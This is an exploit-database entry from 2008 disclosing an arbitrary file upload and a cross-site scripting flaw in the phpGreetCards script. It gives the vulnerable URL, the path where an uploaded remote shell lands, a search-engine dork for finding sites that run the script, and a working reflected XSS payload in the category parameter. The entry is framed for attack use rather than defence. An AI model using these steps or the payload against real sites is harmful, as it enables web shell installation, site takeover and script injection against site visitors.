[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : phpGreetCards XSS/Arbitrary File Upload Vulnerability
# Published : 2008-12-23
# Author : ahmadbady
# Previous Title : CMS NetCat <= 3.12 Multiple Remote Vulnerabilities
# Next Title : phpEmployment (php upload) Arbitrary File Upload Vulnerability


...................................................................................................

****(remote shell upload/xss)****

script: phpGreetCards
   
***************************************************************************
download from:http://www.w2b.ru/download/phpGreetCards.zip
   
***************************************************************************
www.site.com/path/index.php?mode=select&category

shell: www.site.com/path/userfiles/number_shell.php
-----------------------------------------------------------------------------------------
dork:"powered by phpGreetCards"

if folder userfiles is forbidden
after get upload file u do right-click and see image properties and u see address file.
  
------------------------------------------------------------------------------------------
xss:
index.php?mode=select&category=>"><ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>  
**************************************************


Author: ahmadbady 

**************************************************

# www.Syue.com [2008-12-23]